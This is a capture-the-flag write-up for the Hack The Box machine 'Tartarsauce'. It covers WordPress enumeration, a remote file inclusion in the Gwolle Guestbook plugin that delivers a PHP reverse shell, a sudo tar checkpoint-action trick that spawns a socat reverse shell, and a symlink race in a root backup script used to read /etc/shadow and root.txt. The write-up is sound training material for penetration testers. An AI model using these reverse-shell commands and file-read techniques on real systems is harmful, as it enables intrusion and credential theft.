HTB{ Tartarsauce }

Oct 20, 2018 | 12 minutes read

Tags: hack the box, inotify, tar, python

This was a challenging box. It had a lot of places to get lost in the sauce (ba-dum tssss). I found myself crawling back out of rabbit holes more than once while working on Tartarsauce. The two authors, 3mrgnc3 & ihack4falafel, did an excellent job of putting together a box that felt like it was straight out of OSCP. Enumeration and avoiding time-sinks were the keys to success here.




As usual, we start off with a masscan followed by a targeted nmap.

masscan -e tun0 --ports U:0-65535,0-65535 --rate 700 -oL scan.
open tcp 80 1538755374
# end

nmap - tcp

nmap -sC -sV -oN nmap.scan -p 80
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

nmap returns a ton of juicy looking urls from robots.txt. Unfortunately, they were all rabbit holes.


The real entrypoint was easy to miss, unless you’re used to iteratively performing gobuster on each directory found or use a recursive directory enumeration tool.

The first gobuster scan showing /webservices (we also saw this in the nmap scan).

gobuster -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -t 20 -o "gobuster."
1http:// (Status: 403)
2http:// (Status: 403)
3http:// (Status: 403)
4http:// (Status: 200)
5http:// (Status: 200)
6http:// (Status: 403)
7http:// (Status: 301)

The second gobuster on the /webservices directory.

1http:// (Status: 403)
2http:// (Status: 403)
3http:// (Status: 403)
4http:// (Status: 301)

The final gobuster on /webservices/wp directory. This is the one where we know we’re dealing with a WordPress install due to the directory structure (wp-content, wp-admin, etc…). (Status: 403) (Status: 403) (Status: 403) (Status: 301) (Status: 301) (Status: 301) (Status: 301)

Initial Access


Knowing we’re dealing with a WordPress install, wpscan immediately jumps to mind as it’s the standard for WordPress scanning tools.

wpscan -ep --url
wpscan options used:

    --enumerate | -e [option(s)]
      option :
        p        plugins

[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)


If you dig a bit into this plugin, the specific XSS vulnerability referenced isn’t what’s interesting. The interesting piece is outlined in the readme.txt included with the plugin, specifically, the changelog.

 1== Changelog ==
 3= 2.3.10 =
 4* 2018-2-12
 5* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D
 7= 1.5.3 =
 8* 2015-10-01
 9* When email is disabled, save it anyway when user is logged in.
10* Add nb_NO (thanks Bjørn Inge Vårvik).
11* Update ru_RU.

Now that we know the real version is 1.5.3, the way forward becomes clear: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion. According to the Exploit-DB entry, the abspath is being used in a PHP require() function call. It is trying to include a remote file named wp-load.php. We can serve up our own version of that file for RCE.


We can use the php reverse shell hosted on pentestmonkey as our wp-load.php. We just need to modify two lines within the file to reflect our IP address and port and change the name of the file.

# Malicious wp-load.php

$ip = '';  // CHANGE THIS
$port = 12344;       // CHANGE THIS


Spin up a local web server on kali for the target to reach out to when searching for its wp-load.php. Also on kali, fire up a listener to catch the callback.

python3 -m http.server 80 


nc -nlvp 12344 

The final step is to make the request using the vulnerable parameter.


We serve up the php via python and receive our callback.

Serving HTTP on port 80 ( ... - - [05/Oct/2018 12:23:09] "GET /wp-load.php HTTP/1.0" 200 -
Ncat: Connection from

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

\o/ - access level: www-data

www-data to onuma

tar as a Callback

Basic enumeration steps showed that we are able to run the /bin/tar command as the user onuma without a password via sudo.

Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar

We can elevate privileges with the tar command below and grab a full tty shell while we’re at it by using a socat callback as the argument to checkpoint-action.

Local on kali.

socat file:`tty`,echo=0,raw tcp4-listen:12323

On target.

sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='/tmp/socat_x86 tcp-connect: exec:"bash -li",pty,stderr,setsid,sigint,sane'

tar options used:

        display progress messages every NUMBERth record (default 10)

        execute ACTION on each checkpoint
        the exec action executes a given external command

onuma to root.txt

The backuperer Service

During re-enumeration as onuma, we notice that there is an interesting systemd service running.




There is also an associated timer.

Description=Runs backuperer every 5 mins

# Time to wait after booting before we run first time
# Time between running each consecutive time

These two items together run the script below every 5 minutes as the root user.

The key take-aways from the script are highlighted. Essentially, there is a 30-second window between backing up /var/www/html and performing the integrity check with diff. We’ll use that window of time to get root level read access to the filesystem.

 4# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
 5# ONUMA Dev auto backup program
 6# This tool will keep our webapp backed up incase another skiddie defaces us again.
 7# We will be able to quickly restore from a backup in seconds ;P
10# Set Vars Here
16tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
19# formatting
22    for n in $(seq 72);
23    do /usr/bin/printf $"-";
24    done
28# Added a test file to let us see when the last backup was run
29/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
31# Cleanup from last time.
32/bin/rm -rf $tmpdir/.* $check
34# Backup onuma website dev files.
35/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
37# Added delay to wait for backup to complete if large files get added.
38/bin/sleep 30
40# Test the backup integrity
43    /usr/bin/diff -r $basedir $check$basedir
46/bin/mkdir $check
47/bin/tar -zxvf $tmpfile -C $check
48if [[ $(integrity_chk) ]]
50    # Report errors so the dev can investigate the issue.
51    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
52    integrity_chk >> $errormsg
53    exit 2
55    # Clean up and save archive to the bkpdir.
56    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
57    /bin/rm -rf $check .*
58    exit 0

Quick analysis of the code:

  • Line 35: As onuma, create a gzipped tarfile named something like /var/tmp/.e67b1d9… with the contents of /var/www/html/
  • Line 38: Sleep 30 seconds
  • Line 47: Unzip/tar /var/tmp/.e67b1d9… into /var/tmp/check
  • Line 52: Append results of running Line 43 into /var/backups/onuma_backup_error.txt
  • Line 43: Recursively diff /var/www/html and /var/tmp/check/var/www/html

Because we are onuma, we can alter the tarball created by the script. The contents of /var/www/html never change, but we can change the contents of the tarball. If any files are different between the two folders, the differences will be captured in the error log.

Steps to exploit the race condition introduced in the code above:

  • Untar the newly created tarball from /var/tmp to modify
  • Symlink a file we want to read to a file within our local version
  • Retar the tarball in its original location
  • Allow the backuperer to diff what the file should be with what our link points to
  • Read results from /var/backups/onuma_backup_error.txt

Now that we have a way ahead, let’s put our analysis into action.

Over-engineering at its Finest

There are a lot of ways to be able to determine when the tarball is alive and available for manipulation. pspy and a process watcher script come to mind and are much simpler solutions than what I outline below. I’ve been waiting for an excuse to play with inotify and this was a perfect opportunity.

I wanted to write a program that used inotify to trigger reactions when backuperer ran. pspy uses inotify under the hood as well, which is really got me interested in playing with inotify in the first place. I chose to use pyinotify and python instead of using C.

The general steps to the script are what is laid out above. Additionally, I wanted to implement a few nice-to-haves as well.

  • Works without interaction by watching for events (inotify)
  • Ability to read arbitrary number of files (assuming enough real files to link against)
  • Ability to run on target without installing dependencies (zipapp)
  • Only shows me relevant information from /var/backups/onuma_backup_error.txt

Watch for Events (inotify)

As I previously mentioned, the key feature that I wanted to play with while writing this script was inotifiy. The pyinotify module makes handling events really simple.

The basic premise is that you create watches and add them to a watch list. Each item (“watch”) in the watch list specifies the pathname of a file or directory, along with some set of events that the kernel should monitor for the file referred to by that pathname.

When events occur for monitored files and directories, those events are made available to the application as structured data.

For my script, I set two watches detailed below.


The first watch used IN_CLOSE_WRITE on /var/tmp. The IN_CLOSE_WRITE event is triggered when a file that was opened for writing is closed.

The code below creates the WatchManager and adds a watch that handles events produced when a file with /var/tmp that was opened for writing is closed.

wm = pyinotify.WatchManager()
wm.add_watch('/var/tmp', pyinotify.IN_CLOSE_WRITE)  

That done, we define an event handler and register a callback that will execute each time a file that was opened for writing is closed within /var/tmp. We use IN_CLOSE_WRITE because we want the entire tarball to be complete before we do anything with the script. pyinotify uses the naming convention of process_EVENT_NAME within their EventHandler class to know which callback function to call when an event occurs.

class EventHandler(pyinotify.ProcessEvent):
    def __init__(self, *args, **kwargs):
        # -------------8<-------------
    def process_IN_CLOSE_WRITE(self, event: pyinotify.Event) -> None:
        # This function is designed to trigger on the creation of the tarball generated by /usr/sbin/backuperer
        # -------------8<-------------
    def process_IN_MODIFY(self, event: pyinotify.Event) -> None:
        # This function is designed to trigger when /var/backups/onuma_backup_error.txt is appended to
        # -------------8<-------------

handler = EventHandler(...)
notifier = pyinotify.Notifier(wm, handler)


The second watch used IN_MODIFY on /var/backups/onuma_backup_error.txt. The IN_MODIFY event is triggered when a file is modified.

The code below adds another watch to the WatchManager that handles events produced when the error log is modified, i.e. after the diff happens and output is appened to the error log.

wm.add_watch('/var/backups/onuma_backup_error.txt', pyinotify.IN_MODIFY)  # for reading error_log

The additional watch works in concert with the EventHandler class above. With callbacks registered to watch for events triggered by the backuperer service, the next step is to package everything up and get it to target.

Packaged Dependencies (zipapp)

To deploy the script with its dependencies, I chose to use the zipapp module. This module provides tools to manage the creation of zip files containing Python code, which can be executed directly by the Python interpreter.

If you’ve never heard of or played with this module, it’s pretty baller. It isn’t a solution for all dependency problems, but for simple cases, it can be incredibly useful. To magic the script and pyinotify into a single executable zip, all that’s needed is the following:

  • Create a directory
  • Within that directory create your script and name it
  • Install dependencies into the new directory via pip install PACKAGE --target DIR
  • Create the final zip file using the zipapp module.

You can try it out for yourself by using the commands below.

git clone
cd htb-scripts-for-retired-boxes/tartarsauce
python3 -m pip install pyinotify --target triggered
python3 -m zipapp -p "/usr/bin/env python3" triggered

After running the commands above, you should have a triggered.pyz file sitting in your current working directory. If you run file on it, you can see it’s a labeled as a zip archive.

NOTE: I had to do the following on my kali box to get pip3 installed, YMMV


Test Run

For the sake of brevity, I didn’t include the entire script here. You can find it here. I commented it well enough that it’s hopefully easy to follow. I plan to start including non-trivial HTB soltuion-related scripts in that repo (smasher comes to mind).

Here is a sample run of the script against a few files.

./triggered.pyz /var/tmp --to_read /root/root.txt /var/backups/gshadow.bak /var/backups/shadow.bak /var/backups/passwd.bak /var/backups/group.bak /etc/shadow /etc/gshadow
[+] Files to read:
[-] /root/root.txt
[-] /var/backups/gshadow.bak
[-] /var/backups/shadow.bak
[-] /var/backups/passwd.bak
[-] /var/backups/group.bak
[-] /etc/shadow
[-] /etc/gshadow

[+] Tarball created by /usr/sbin/backuperer
[-] /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8

[+] Files from /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8 extracted

[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-mail.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-mail.php to /root/root.txt
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-links-opml.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-links-opml.php to /var/backups/gshadow.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-comments-post.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-comments-post.php to /var/backups/shadow.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/.htaccess
[-] Linking /tmp/var/www/html/webservices/wp/.htaccess to /var/backups/passwd.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-trackback.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-trackback.php to /var/backups/group.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/xmlrpc.php
[-] Linking /tmp/var/www/html/webservices/wp/xmlrpc.php to /etc/shadow
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-cron.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-cron.php to /etc/gshadow
[-] All files to be read are linked.

[+] Tarring up the altered backup.
[-] Tarball /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8 created.

[+] Error log modified, checking results.

[+] /var/backups/passwd.bak

[+] /var/backups/shadow.bak

[+] /etc/gshadow

[+] /var/backups/gshadow.bak

[+] /root/root.txt

[+] /var/backups/group.bak

[+] /etc/shadow

As you can see, it can grab any root owned file, including root.txt. I had a lot of fun working on the box and finally squirreling out and writing the script to automate the root read access.

\o/ - root read access

I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.


Additional Reading

comments powered by Disqus